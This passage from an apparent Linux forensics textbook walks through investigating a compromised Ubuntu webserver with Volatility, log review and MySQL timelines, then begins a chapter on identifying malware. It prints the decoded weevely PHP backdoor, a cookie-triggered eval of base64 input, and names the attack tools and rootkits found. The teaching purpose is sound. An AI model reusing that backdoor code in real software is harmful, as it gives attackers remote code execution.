linux_banner | Prints Linux banner information | Similar to uname -a command
linux_check_evt_arm | Check Exception Vector Table | ARM architecture only
linux_check_syscall_arm | Check system call table | ARM architecture only
linux_cpuinfo | Print CPU info | Gives CPU model only
linux_dentry_cache | Use dentry cache to make timeline | Likely fails with recent kernels
linux_dmesg | Print dmesg buffer | Same as cat /var/log/dmesg
linux_dump_map | Writes memory maps to disk | Good for malware analysis
linux_elfs | Print ELF binaries from process maps | Lots of output (too much?)
linux_hidden_modules | Carves memory for kernel modules | Found Xing Yi Quan rootkit
linux_info_regs | Print CPU register info | Fails for 64-bit Linux
linux_iomem | Similar to running cat /proc/iomem | Displays input/output memory
linux_kernel_opened_files | Lists files opened by kernel |
linux_ldrmodules | Compare proc maps to libdl | Lots of output
linux_library_list | Lists libraries used by a process | Useful for malware analysis
linux_library_dump | Dumps shared libraries to disk | Use -p to get libs for a process
linux_lsmod | Print loaded modules | Similar to lsmod command
linux_lsof | Lists open files | Similar to lsof command
linux_malfind | Look for suspicious process maps |
linux_memmap | Dump the memory map for a task | Useful for malware analysis
linux_moddump | Dump kernel modules | Useful for malware analysis
linux_mount_cache | Print mounted filesystems from kmem_cache | Likely fails for recent kernels
linux_pidhashtable | Enumerates processes based on the PID hash table |
linux_pkt_queues | Dump per-process packet queues | Likely fails for recent kernels
linux_plthook | Scan ELF Procedure Linkage Table | Useful for malware analysis
linux_process_hollow | Check for process hollowing, which is a technique for hiding malware inside a legitimate process | Can discover malware. Requires base address to be specified.
linux_pslist_cache | Lists processes using kmem_cache | Likely fails for recent kernels
linux_recover_filesystem | Recovers the entire cached filesystem | Likely fails for recent kernels
linux_route_cache | Recovers routing cache from memory (removed in kernel 3.6) | Likely fails for recent kernels
linux_sk_buff_cache | Recovers packets from kmem_cache | Likely fails for recent kernels
linux_slabinfo | Prints info from /proc/slabinfo | Likely fails for recent kernels
linux_strings | Searches for list of strings stored in a file | Takes a long time to run
linux_threads | Prints threads associated with processes | Useful for malware analysis
linux_tmpfs | Recover tmpfs from memory | Likely fails for recent kernels
linux_truecrypt_passphrase | Recover TrueCrypt passphrases |
linux_vma_cache | Recover Virtual Memory Areas | Likely fails for recent kernels
linux_volshell | Python shell which allows Volatility scripts to be run interactively | Unless you know a decent amount of Python, you will likely never use this.
linux_yarascan | Use YARA rules to locate malware | Useful for malware identification
As you can see from Table 8.1, many of the Volatility commands for Linux don't work with recent kernels. The remaining commands are predominantly used for malware analysis. You might see some of them in Chapter 10 where we delve a bit deeper into malware.
SUMMARY
In this chapter we have introduced the most commonly used Volatility commands for incident response on a Linux system. We saw that many of these commands returned no additional information about the attack on PFE's computer. In the next chapter we will discuss how this situation changes when the attacker uses some more advanced techniques than those employed in the PFE hack.
CHAPTER 9
Dealing With More Advanced Attackers
INFORMATION IN THIS CHAPTER:
Summary of an unsophisticated attack
Live response
Memory analysis of advanced attacks
Filesystem analysis of advanced attacks
Leveraging MySQL
Reporting to the client
SUMMARY OF THE PFE ATTACK
Up to this point in the book, we have discussed a rather simple attack against a developer workstation at PFE. After finishing your investigation you determined that the breach was caused by the john user having a weak password. It seems that in early March 2015 an attacker realized that the subject system had a john user with administrative access and was connected to the Internet while exposing SSH and FTP servers.
It is difficult to say exactly how the attacker came to have this knowledge. He or she might have done some research on the company and made some reasonable guesses about Mr. Smith's username and likely level of access on his workstation. The attacker doesn't appear to have sniffed John's username directly from the FTP server, as there would have been no need to crack the password if this were the case, since the login information is sent unencrypted.
You can tell that the username was known, but the password was not, because the attacker used Hydra, or a similar online password cracker, to repeatedly attempt to log in as the john user until he or she was successful. The fact that success came quickly for the attacker was primarily the result of Mr. Smith choosing a password in the top 50 worst passwords. The logs reveal that no other usernames were used in the attack.
Once logged in as John, the attacker used his administrative privileges to set up the bogus johnn account, modify a couple of system accounts to permit them to log in, overwrite /bin/false with /bin/bash, and install the Xing Yi Quan rootkit. We have seen the attacker struggle and resort to consulting man pages, and other documentation, along the way. Had Mr. Smith been forced to select a more secure password, this breach may never have occurred, given the attacker's apparently low skill level. What does incident response look like when the attacker has to work a little harder? That is the subject of this chapter.
THE SCENARIO
You received a call from a new client, Phil's Awesome Stuff (PAS). PAS is a small company that sells electronic kits and other fun items to customers that like to play with new technology. Their CEO, Dr. Phil Potslar, has called you because the webmaster has reported that the webserver is acting strangely. As luck would have it, PAS is also running Ubuntu 14.04.
After interviewing Phil and the webmaster, you discover that neither of them knows much about Linux. The webmaster has only recently begun using Linux after dropping Internet Information Services (IIS) as a webserver upon learning how insecure it was at a conference. The current system has been up for two months and is built on Apache 2 and MySQL. The web software is written in PHP. The hardware was purchased from a local computer shop two years ago and originally ran Windows 7 before being wiped and upgraded to Ubuntu.
The webmaster reports that the system seems sluggish. A “System Problem Detected” warning message also seems to be popping up frequently. Having completed your interviews, you are now ready to begin a limited live response in order to determine if there has been a breach. Before traveling to PAS, you walked the webmaster through the process of installing Snort and doing a basic packet capture for a little while in order to have some additional data to analyze upon your arrival.
INITIAL LIVE RESPONSE
Upon arriving at PAS, you plug your forensics workstation into the network and start your netcat listeners as shown in Figure 9.1. Then you plug your response flash drive into the subject machine, load known-good binaries, and execute the initial-scan.sh script as shown in Figure 9.2.
FIGURE 9.1
Starting a case on forensics workstation.
FIGURE 9.2
Loading known-good binaries and performing the initial scan on the subject.
Upon examining the log file generated by initial-scan.sh, it quickly becomes apparent that something is amiss. One of the first things you notice is that a shell is listening on port 44965, as shown in Figure 9.3. Using netcat, you perform a quick banner grab on this port and find that it reports itself as SSH-2.0-WinSSHD, as shown in Figure 9.4. After doing some research, you discover that this is a dropbear SSH backdoor. You attempt to SSH to this machine, which confirms your suspicions (this is also shown in Figure 9.4).
FIGURE 9.3
Part of the initial-scan log file. Highlighted portion shows a shell that is listening on port 44965.
FIGURE 9.4
Banner grab and SSH login attempt that confirm the existence of a dropbear SSH backdoor on port 44965.
So far we know that something has happened, because a backdoor has been installed. Examination of failed login attempts reveals a long list of failed attempts for the john user via SSH on May 3 at 23:07. This is shown in Figure 9.5. It is not yet clear if these attempts occurred before or after the backdoor was installed.
FIGURE 9.5
A large number of failed login attempts within the same minute.
Further analysis of the initial-scan.sh log reveals that a new user, mysqll, with a home directory of /usr/local/mysql has been created. Furthermore, the user ID has been set to zero, which gives this new user root access. The relevant part of the log is shown in Figure 9.6.
FIGURE 9.6
Evidence of a bogus user with root access.
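Spotting a second account with a user ID of zero is simple to automate. The following Python sketch is an illustration only and is not part of the initial-scan.sh script. It assumes the standard seven-field passwd format, and the sample entries (including the shell and group ID shown for mysqll) are hypothetical.

```python
def uid_zero_accounts(passwd_text):
    """Return account names other than root whose user ID field is 0."""
    accounts = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            accounts.append(fields[0])
    return accounts


# Hypothetical passwd content for illustration.
sample_passwd = """\
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:John,,,:/home/john:/bin/bash
mysqll:x:0:0::/usr/local/mysql:/bin/bash
"""

print(uid_zero_accounts(sample_passwd))
```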
You give Dr. Potslar the bad news, that his webserver has in fact been compromised. When he hears of the backdoor, he makes the decision to replace the webserver with a new machine (it was time for an upgrade anyway). A new machine is purchased from a local store, and a friend of yours helps PAS install a fresh version of Ubuntu on the machine, install and configure Snort, set up a webserver with fresh code from the webmaster's code repository, replicate the MySQL database from the webserver, and switch it out for the existing server. Your friend works closely with the webmaster so that he can perform this process unassisted should the new server become re-infected.
Your work is far from over. At this point you know that the machine was compromised but not how and why. Once the new server is in place and verified to be working properly, you use LiME to extract a memory image and then shut down the subject machine by pulling the plug. According to your initial-scan.sh log, the machine is running Ubuntu 14.04 with a 3.16.0-30 kernel. As you already have a LiME module for this exact configuration, dumping the RAM was as simple as running sudo insmod lime-3.16-0-30-generic.ko "path=tcp:8888 format=lime" on the subject system, and then running nc 192.168.56.101 8888 > ram.lime on the forensics workstation.
You pull the hard drive from the subject computer and place it into your USB 3.0 drive dock. Using the udev rules-based write blocking, as described in Chapter 4, and dcfldd, you create a forensic image of the hard drive which you store on a portable 6 TB USB 3.0 drive with all of the other data related to this case. Even though the chances of finding a remote attacker are slight, you still need to figure out what happened to prevent a recurrence. Also, we have not yet performed enough analysis to rule out an insider who could be prosecuted or subject to a civil lawsuit. It never hurts to be able to prove the integrity of your evidence.
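One common way to support a claim of integrity is to record a cryptographic hash of each image when it is created and to recompute it later. The Python sketch below is a minimal illustration and is not a replacement for the hashing that dcfldd can perform during imaging. The function name is hypothetical, and the choice of SHA-256 is an assumption.

```python
import hashlib


def sha256_of_file(path, chunk_size=1024 * 1024):
    """Hash a file in fixed-size chunks so large images need not fit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Calling sha256_of_file("ram.lime") right after acquisition, and again before analysis, gives two values that should be identical if the image has not changed.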
MEMORY ANALYSIS
You decide to start with memory analysis in hopes that it will guide you to the correct places during your filesystem analysis. As always, there is nothing that stops you from switching back and forth between memory analysis and filesystem analysis. As before, we define an alias for Volatility in the .bashrc file as shown in Figure 9.7.
FIGURE 9.7
Adding an alias to .bashrc to more easily run Volatility.
Partial results from the Volatility linux_pslist command are shown in Figure 9.8. From these results we see that this system also has the Xing Yi Quan rootkit. The in.ftpd process being run with an invalid user ID of 4294936576 in the last line of Figure 9.8 also looks a bit suspicious.
FIGURE 9.8
Partial results from running the Volatility linux_pslist command against the PAS subject system. The highlighted portion shows a rootkit process. The last process listed also has a suspicious user ID.
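One way to see why a user ID of 4294936576 stands out is to reinterpret it as a signed 32-bit number. This is only an observation about the value, not an explanation taken from the investigation, and the helper name below is hypothetical.

```python
def as_signed_32(value):
    """Reinterpret an unsigned 32-bit value as a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


print(as_signed_32(4294936576))  # -30720
```

A value that reads as a small negative number suggests a field that was never a real account ID, which is a reason to look more closely at that process.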
Running the Volatility linux_psaux command provides some more detail on what is happening. As can be seen in Figure 9.9, in process 8019 the user with ID 1001 changed to the bogus mysqll user with the command su mysqll. This generated a bash shell with root privileges because mysqll has a user ID of zero (process 8021). The xingyi_bindshell is running with root privileges in process 8540. The rootkit was likely started from the shell in process 8021. This can be verified by running linux_pstree.
FIGURE 9.9
Partial results from running the Volatility linux_psaux command against the PAS subject system. The highlighted portion shows malicious activity.
We noticed a dropbear SSH backdoor listening on port 44965. We can use the Volatility linux_netstat command and pipe the results to grep TCP to discover the process ID for this process. Partial results from this command are shown in Figure 9.10. From the results we see that the dropbear process ID is 1284. This low process number suggests that dropbear has been set to automatically start. The linux_pstree results support this inference. Furthermore, the linux_pstree results reveal that the root shell in process 9210 was launched by xingyi_bindshell running in process 8540.
FIGURE 9.10
Partial results from running the Volatility linux_netstat command against the PAS subject system and piping the output to “grep TCP”.
The process maps for the two suspicious processes are captured with the linux_proc_maps command as shown in Figure 9.11. The process spaces for both programs are also dumped to disk for later analysis as shown in Figure 9.12.
FIGURE 9.11
Saving process maps for suspicious processes.
FIGURE 9.12
Saving process memory for suspicious processes.
The linux_bash command produces some very enlightening results. As shown in Figure 9.13 and Figure 9.14, the attacker is actively trying to become more deeply embedded in the system. A lot of malicious activity was recorded in the bash history for process 9210. The results from linux_pslist confirm that this is a root shell. Figure 9.13 shows the attacker downloading and installing the Weevely PHP backdoor. Later, in Figure 9.14, the attacker can be seen downloading the rockyou.txt password list and then performing an online password attack against the sue user account with Hydra.
FIGURE 9.13
Downloading and installing a rootkit.
FIGURE 9.14
Online password cracking with Hydra.
Hydra was used against the local FTP server. Before launching Hydra, the attacker copied both the /etc/passwd and /etc/shadow files. It isn't clear why Hydra was used, instead of an offline password cracker like John the Ripper. Perhaps the attacker didn't want to copy off the passwd and shadow files. Using the local FTP server for password cracking is somewhat fast and may not generate alerts if an installed Intrusion Detection System (IDS) isn't configured to monitor this traffic.
The linux_psenv command run against processes 8540, 1284, and 9210 produces interesting results. Some of the results are shown in Figure 9.15. The highlighted portion shows that a hidden directory /usr/local/mysql/.hacked has been created. The process environment for the dropbear backdoor confirms that this program is automatically started when the system boots to runlevel 2 or higher.
FIGURE 9.15
Partial results from running the Volatility linux_psenv command against suspicious processes on the PAS subject system.
The entire suite of Volatility linux_check_xxxx commands was run against the PAS subject system. Only the linux_check_syscall command returned any results. Some of these results are displayed in Figure 9.16. From the results we can see that Xing Yi Quan has hooked the 64-bit system calls for open, lstat, dup, kill, getdents, chdir, rename, rmdir, and unlinkat. When viewed with the complete output for this command, the addresses for hooked system calls are noticeably different from the unaltered call handlers.
FIGURE 9.16
Partial results from the Volatility linux_check_syscall command run against the PAS subject system.
The Volatility linux_enumerate_files command was run against the PAS subject system and the results were saved to a file. Egrep was then used on the file to locate certain files in the filesystem cache. The partial results shown in Figure 9.17 reveal that the rockyou.txt password list and the Xing Yi Quan rootkit are both stored in the hidden directory /usr/local/mysql/.hacked.
FIGURE 9.17
Malicious files stored in a hidden directory.
While Volatility could be used to retrieve some files from the file cache, it is likely easier to just use the filesystem image for this purpose. If there is a need to retrieve more information from the memory image, the memory image is not going anywhere. We might return to using Volatility when performing malware analysis.
FILESYSTEM ANALYSIS
At this point, we know there are at least two pieces of malware that were likely installed around May 4, based on the bash histories. We also know that a new user with administrative privileges was created and that the attacker has attempted to crack additional passwords on the system. What we do not know yet is when the initial breach occurred and how.
Using our Python scripts from Chapter 5, the disk image is easily mounted on the forensics workstation. Once this is accomplished, running grep 1001 on the passwd file reveals that user ID 1001, which was used to launch one of the root shells, belongs to the michael user, whose real name is Michael Keaton.
Because the system was running a webserver, and the Weevely PHP backdoor was installed, it makes sense to have a look at the webserver logs for some possible insight into how the breach occurred. We do not know at this point if the breach was caused by a problem with the website, but it is certainly worth checking out.
The Apache webserver logs can be found in /var/log/apache2. The two primary log files are access.log and error.log, which store requests and errors, respectively. Both of these logs have the standard numbered archives. After examining the access logs, it is discovered that a rarely used, obscure page, called dns-lookup.php, is called 51 times late on May 3. A look at the error logs reveals 19 errors logged about the same time. Some of these results are shown in Figure 9.18.
FIGURE 9.18
Evidence of an attack on the webserver.
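Counting requests per page is a quick way to make an unusual burst like this stand out. The Python sketch below is an illustration only. It assumes the access log uses the common Apache format in which the request appears in double quotes, and the sample lines (including the documentation-range IP address) are hypothetical.

```python
from collections import Counter


def requests_per_page(access_log_lines):
    """Count requests per URL path, ignoring any query string."""
    counts = Counter()
    for line in access_log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue  # no quoted request on this line
        request = parts[1].split()  # e.g. ['GET', '/page.php?x=1', 'HTTP/1.1']
        if len(request) >= 2:
            counts[request[1].split("?")[0]] += 1
    return counts


# Hypothetical log lines for illustration.
sample_log = [
    '203.0.113.5 - - [03/May/2015:22:50:01 -0400] "GET /dns-lookup.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [03/May/2015:22:50:02 -0400] "POST /dns-lookup.php HTTP/1.1" 200 498',
    '203.0.113.5 - - [03/May/2015:22:51:10 -0400] "GET /index.php?id=3 HTTP/1.1" 200 2048',
]

for page, hits in requests_per_page(sample_log).most_common():
    print(page, hits)
```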
Examination of the MySQL logs found in /var/log/mysql covering the same period of time reveals that they contain multiple errors. The zcat command was used to cat the compressed log files, which were then piped to egrep. The complete command used was zcat error.log.2.gz | egrep '(^150503)|(ERROR)'. The regular expression in the egrep command displays only lines that begin with the date code for May 3 or that contain an error. Partial results from this command are shown in Figure 9.19.
FIGURE 9.19
MySQL errors indicating a possible website attack.
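The same filter can be written in a few lines of Python, which may be convenient if the results are going to be processed further. This is only a sketch of an equivalent to the zcat and egrep pipeline, and the function name is hypothetical.

```python
import gzip
import re

# Same expression as the egrep command: date code for May 3, or any ERROR.
PATTERN = re.compile(r"(^150503)|(ERROR)")


def matching_lines(path, pattern=PATTERN):
    """Return lines from a gzip-compressed log that match the pattern."""
    with gzip.open(path, "rt", errors="replace") as handle:
        return [line.rstrip("\n") for line in handle if pattern.search(line)]
```

For example, matching_lines("error.log.2.gz") would return the lines that the shell pipeline prints.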
Memory analysis revealed the existence of a hidden directory /usr/local/mysql/.hacked. Issuing the command ls -al from the /usr/local/mysql directory reveals several interesting things. There is another hidden directory, /usr/local/mysql/.weevely, that was created shortly after the suspicious web activity occurred on May 3. Immediately after the webserver attack, .bashrc and .bash_logout files were created in the /usr/local/mysql directory. A .bash_history file in the same directory reveals the installation of the weevely backdoor with a password of “hacked”. These results are displayed in Figure 9.20.
FIGURE 9.20
Evidence of the installation of the weevely PHP SSH backdoor.
LEVERAGING MYSQL
The picture of what happened to the PAS webserver is starting to become pretty clear. Because it literally only takes a couple of minutes, the metadata is imported into MySQL using the techniques discussed in Chapter 6. Once everything is loaded in the database, a timeline from May 3 onward is easily created. The timeline shows intense webserver activity at approximately 22:50 on the 3rd of May. Further analysis reveals changes in the /usr/local/mysql/.weevely directory at 23:53 and the creation of a new file, /var/www/html/index3.php. A portion of the timeline is shown in Figure 9.21.
FIGURE 9.21
Portion of the PAS subject system timeline. The highlighted portion shows new files associated with backdoors.
The index3.php file is shown in Figure 9.22. This is some obfuscated code created by the weevely backdoor. This code both inserts extra characters and uses base64 encoding to hide what it does. $kh becomes “str_replace”, $hbh equals “base64_decode”, and $km is set to “create_function”. This makes the last line $go = create_function('', base64_decode(str_replace("q", "", $iy.$gn.$mom.$scv))); $go();. Parsing all of this through an online base64 decoder produces the following:
$c='count';$a=$_COOKIE;if(reset($a)=='ha' && $c($a)>3){ini_set('error_log','/dev/null');$k='cked';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'),join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}
FIGURE 9.22
Obfuscated PHP code from the weevely PHP SSH backdoor.
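The two layers of obfuscation described here (filler characters plus base64) can be undone offline without sending a sample to a website. The Python sketch below is only an illustration of the technique. The function name is hypothetical, and the fragments are a harmless made-up payload, not the contents of index3.php.

```python
import base64


def deobfuscate(fragments, filler="q"):
    """Join the fragments, strip the filler character, then base64-decode."""
    joined = "".join(fragments)
    cleaned = joined.replace(filler, "")
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")


# Made-up fragments: the base64 text of a harmless string with "q" inserted.
# This only works when the real base64 payload contains no "q" of its own.
fragments = ["ZWqNo", "byqAx", "Oqw=="]

print(deobfuscate(fragments))
```

Decoding on the forensics workstation also avoids handing possibly sensitive case data to a third-party online decoder.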
If you look closely enough, you will see that the weevely password “hacked” is embedded in this code in obfuscated form, split into the strings 'ha' and 'cked'.
Further analysis of the timeline reveals that Hydra was run a few times on the 4th of May. Some of the packet captures created by the webmaster, after a problem was suspected, were also analyzed. There seems to have been a test of the dropbear backdoor on port 44965 in this capture, but most traffic seems to be coming directly on port 22. Some of this traffic is shown in Figure 9.23.
FIGURE 9.23
Some of the traffic captured from the PAS subject system. The bottom four packets appear to be a test of the dropbear backdoor. The remaining packets in this capture are on the normal SSH port 22.
Partial results from running the query select * from logins order by start; are shown in Figure 9.24. The highlighted entries are around the time of the breach. A complete analysis of this information reveals that only John and Michael have been logging on to the system. This indicates that either John's password has been compromised or that the attacker is not logging in directly. The other evidence gathered so far points to the latter.
FIGURE 9.24
Login information from the PAS subject system.
Running this query of failed logins, select * from login_fails order by start;, paints a different picture. There is a long string of failed login attempts for John up until 23:07:54 on the 3rd of May. When combined with a successful remote login by John at 23:10:11 that day, it would appear that John's account has been compromised. The failed logins are shown in Figure 9.25. At this stage it would appear that the initial compromise was the result of a webserver vulnerability. Once the attacker had his or her foot in the door, additional attacks were performed resulting in at least one compromised password.
FIGURE 9.25
Failed login attempts. The failed attempts happen repeatedly until 23:07:54. Consultation with the information from Figure 9.24 indicates that the password was compromised.
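The reasoning used here, a burst of failures followed shortly by a success for the same account, can be expressed as a small check over the two result sets. The Python sketch below is only an illustration. The function name, the five-minute window, and the minimum failure count are assumptions, and only the 23:07:54 and 23:10:11 times come from the case. The other sample times are hypothetical.

```python
from datetime import datetime, timedelta


def success_after_failures(failures, successes,
                           window=timedelta(minutes=5), min_failures=3):
    """Return (user, login_time, failure_count) for suspicious successes."""
    hits = []
    for user, ok_time in successes:
        recent = [when for name, when in failures
                  if name == user and timedelta(0) <= ok_time - when <= window]
        if len(recent) >= min_failures:
            hits.append((user, ok_time, len(recent)))
    return hits


day = datetime(2015, 5, 3)
failures = [("john", day.replace(hour=23, minute=7, second=s))
            for s in (50, 51, 52, 53, 54)]
successes = [("john", day.replace(hour=23, minute=10, second=11)),
             ("michael", day.replace(hour=9, minute=0, second=0))]

for user, when, count in success_after_failures(failures, successes):
    print(f"{user}: login at {when} follows {count} recent failures")
```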
While the bash history from .bash_history files doesn't have timestamps, as the history from Volatility does, it can still provide useful information. As shown in Figure 9.26, John's account was used to download and install two additional rootkits that we have not yet discovered. The first one is a web shell called Poison that was installed on the webserver as index2.php. The second one is called RK.
FIGURE 9.26
Evidence of the installation of two additional rootkits.
A listing of PHP files in the document root and the start of the index2.php file are shown in Figure 9.27. The index2.php claims to be the Poison Shell 1.0 by Doddy Hackman. Notice that the timestamp on index2.php is from 2013, unlike some of the other pieces of malware discovered so far that didn't alter the timestamps.
FIGURE 9.27
Evidence that the Poison Shell 1.0 has been installed on the subject system.
We see a hidden directory called “.rk” that is used to store the RK rootkit. Because we have the subject's filesystem mounted, we can use the command find <mount point> -type d -name '.*' to locate all hidden directories. The results of running this command against the PAS subject system are shown in Figure 9.28. Note that the “.rk” directory is not listed. This directory must have been deleted later. Furthermore, no new suspicious directories are found.
FIGURE 9.28
Hidden directories on the PAS subject system.
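A rough Python equivalent of the find command is shown below for cases where the list of hidden directories is going to be processed by a script. It is a sketch only, and the function name is hypothetical. Like find with -type d, it skips symbolic links that point to directories.

```python
import os


def hidden_directories(mount_point):
    """Return paths of directories below mount_point whose names start with a dot."""
    found = []
    for root, dirs, _files in os.walk(mount_point):
        for name in dirs:
            path = os.path.join(root, name)
            if name.startswith(".") and not os.path.islink(path):
                found.append(path)
    return sorted(found)
```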
MISCELLANEOUS FINDINGS
Running the out-of-sequence-inodes.sh script from Chapter 7 on the /sbin directory revealed nothing interesting. As with our first case, running this script on the /bin directory allows the Xing Yi Quan rootkit to be easily seen. Partial output from this command is shown in Figure 9.29.
FIGURE 9.29
Out of sequence inodes for a recently added rootkit.
After you inform Dr. Potslar of the excessive requests for dns-lookup.php on May 3, he passes this information along to the webmaster. The webmaster then has a look at this code with the help of a friend from the local Open Web Application Security Project (OWASP) chapter which he has recently joined. They discover a code execution vulnerability on this page.
SUMMARY OF FINDINGS AND NEXT STEPS
You are now ready to write up your report for PAS. Your report should normally include an executive summary of less than a page, narrative that is free of unexplained technical jargon, and concrete recommendations and next steps (possibly with priority levels if it makes sense). Any raw tool outputs should be included in an appendix or appendices at the end of the report, if at all. It might make sense to burn all of this to a DVD, which includes tool outputs and your database files.
What should you do with the subject hard drive and your image? That depends on the situation. In this case there is very little chance of ever finding the attacker. Even if the attacker were found, he or she would quite possibly be in a jurisdiction that would make prosecution difficult or impossible. If this is not the case, a lawsuit might be a bad business decision given the costs involved (both money and time). No customer information is stored on the PAS subject machine. The vast majority of the company's sales occur at various conferences and trade shows. Customers wanting to buy products from the website are directed to call or e-mail the company. Given all of this, you might as well return the hard drive to the company. The image can be retained for a reasonable time, with the cost of the backup drive containing the image and all other case-related files included on your bill to PAS.
Summary of findings:
On the evening of May 3, an attacker exploited a vulnerability in the dns-lookup.php file on the webserver.
The attacker likely used the access gained to gather information about the system. The details of what he or she did are not available because parameters sent to web pages are not recorded in the logs.
After repeated failed SSH login attempts using John's account shortly after the breach (many of which occurred in the same minute), the attacker successfully logged in using John's account. An online password cracker, such as Hydra, was likely used. The fact that the attacker was successful so quickly suggests that John has a weak password.
The attacker installed at least three rootkits or backdoors on the system.
There is evidence to suggest that the attacker attempted to crack other passwords. Michael's account was used on one occasion, which suggests his password may have been cracked. A command to crack Sue's password was found in history files. It is unknown if the attack against her password was successful as her account has never been used to log in to this machine.
The attacker seems to have primarily worked by using SSH to remotely log in with John's account, which has administrative privileges.
The attacker created a bogus account with a username of mysqll. This account had administrative privileges. On one occasion the attacker logged in remotely as Michael and then switched to the mysqll account.
Recommendations:
Urgent: Fix the vulnerability in dns-lookup.php.
Urgent: All users must change passwords to something secure. It is recommended that new passwords are verified to not be in the rockyou.txt password list.
Important: Examine the entire website for other vulnerabilities. It is recommended that all items on the OWASP Top 10 list (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) be checked at a minimum.
Recommended: Install Snort or other Intrusion Detection System on the new web server.
Recommended: Support the webmaster in his efforts to learn more about website security.
Recommended: Limit accounts on the web server to the bare minimum. Several accounts on this server appear to be unused (e.g., Sue’s account, which was targeted by the attacker).
Recommended: Periodic review of logs with emphasis on the Apache and MySQL logs. The initial breach might have been detected by such a review.
Recommended: Periodic penetration tests should be performed. If hiring a penetration tester is not economically feasible, at a minimum, the webmaster or other PAS employee should become familiar with and use several web vulnerability scanners.
SUMMARY
In this chapter we walked through an attack that was slightly more sophisticated than the PFE attack discussed earlier in this book. We found that the same techniques could be employed, regardless of the sophistication level of the attacker. Getting the full picture of the attacker’s actions required the use of live analysis, memory analysis, and filesystem analysis. We were able to research the malware installed to discover its functionality. In the next chapter, we will discuss how to analyze unknown executables. Our conversation will include determining if unknown files are actually malware.
CHAPTER 10
Malware
INFORMATION IN THIS CHAPTER:
The file command
Using hash databases to identify malware
Using strings to gather clues
The nm command
The ldd command
Using readelf to get the big picture
Using objdump for disassembly
Using strace to track system calls
Using ltrace to track library calls
Using the GNU Debugger
Obfuscation techniques
IS IT MALWARE?
You’ve discovered a file left by an attacker on the subject system. Naturally, you want to know if it is some sort of malware. The first thing you want to do is classify the file. Is it an executable or some sort of data file? If it is executable, what does it do? What libraries does it use? Does it connect to the attacker across the network?
While this is not a book on reverse engineering Linux malware, the information from this chapter should be sufficient for you to distinguish malware from benign files and glean a high-level understanding of what types of functions malware performs. From your client’s perspective, they do not care what the malware does or how many clever techniques were used by the programmer. Their biggest concern is what information may have been compromised as the result of the malware. This should be your biggest concern as well. In some cases, you may need to do some investigation of the malware to help you determine the extent of the damage.
The file command
Unlike Windows, which stupidly uses file extensions to determine file type, Linux is smart enough to determine what a file is by looking at its file signature. The Linux file command is used to display the file type to the user. The file command goes way beyond providing information on a file’s extension.
The results of running file on some of the files associated with the Xing Yi Quan rootkit from the PAS subject system are shown in Figure 10.1. Notice that file is able to distinguish between the install, README, and xingyi_addr.c files, which are an executable Perl script in ASCII text, a plain ASCII text file, and a C source file in ASCII text, respectively. Compare this to Windows, which cannot distinguish install from README, because there is no file extension (which normally indicates a directory for Windows).
FIGURE 10.1
Results of running the file command on rootkit files saved from the PAS subject system.
The information provided for binary files is much more specific. Here we see that the binaries are 64-bit Executable and Linkable Format (ELF) files for little endian (LSB) systems based on the System V branch of UNIX (Linux is such a system). They are also dynamically linked, meaning they use shared libraries, as opposed to statically linking all the code they need in the executable (which would make it huge). The file is compatible with kernel versions 2.6.24 and higher. The files have not been stripped of the debugging symbol information. A Secure Hash Algorithm (SHA) hash for each binary build identifier is also given.
As you can see, this one command provides quite a bit of information. If file doesn’t identify the suspicious file as an executable binary or a script, it is probably some sort of data file, or a component that was used to build some malware. For files that are not executable, there are ways of telling if executables use a file. These methods will be discussed later in this chapter (although there are also ways of obscuring this from would-be reverse engineers).
Is it a known-bad file?
A number of organizations maintain databases of known malware MD5 and SHA hashes. Naturally, most of these hashes pertain to Windows, the king of malware, but many databases list Linux malware as well. Some of these databases must be downloaded and others must be accessed online. One of the online databases that is accessible via multiple services is the Malware Hash Registry (MHR) maintained by Team Cymru (http://team-cymru.org/MHR.html).
One of the nice things about MHR is that it uses both MD5 and SHA hashes. The SHA hash is easily calculated using sha1sum <filename>. Perhaps the easiest way to use the MHR is via the whois command. The whois service is normally used to look up information on a web domain. The syntax for using this service to check a binary is whois -h hash.cymru.com <MD5 or SHA hash>. If the file is known, the UNIX timestamp for the last seen time, along with the anti-virus detection percentage, is returned. The results of running this command against one of the Xing Yi Quan files are shown in Figure 10.2.
FIGURE 10.2
Checking a binary hash against the Malware Hash Registry.
Why didn’t this return a hit? Recall that hash functions are designed such that changing a single bit radically changes the hash value. Many pieces of Linux malware are built on the victim machine, which makes it easy to hard code values such as passwords and addresses, while simultaneously changing any hash values.
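The point about a single changed bit can be checked with a short Python sketch. This is only an illustration under stated assumptions: the helper names (file_digests, flip_lowest_bit, mhr_whois_command) are invented for this example, and the sample byte string merely stands in for a value that malware might hard code. The whois helper only builds the command line described above; it does not contact the registry.

```python
import hashlib


def file_digests(path, chunk_size=65536):
    """Return (md5_hex, sha1_hex) for a file, reading it in chunks."""
    md5 = hashlib.md5()
    sha1 = hashlib.sha1()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def flip_lowest_bit(data):
    """Return a copy of data with the lowest bit of its first byte flipped."""
    return bytes([data[0] ^ 0x01]) + data[1:]


def mhr_whois_command(digest):
    """Build (but do not run) the whois command line for an MHR lookup."""
    return ["whois", "-h", "hash.cymru.com", digest]


if __name__ == "__main__":
    original = b"password=example"      # hypothetical hard-coded value
    altered = flip_lowest_bit(original)  # differs from original by one bit
    print(hashlib.sha1(original).hexdigest())
    print(hashlib.sha1(altered).hexdigest())
    print(" ".join(mhr_whois_command(hashlib.sha1(original).hexdigest())))
```

The two digests printed share no obvious relationship, which is why a binary rebuilt on the victim machine with a different password or address will not match a published hash.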
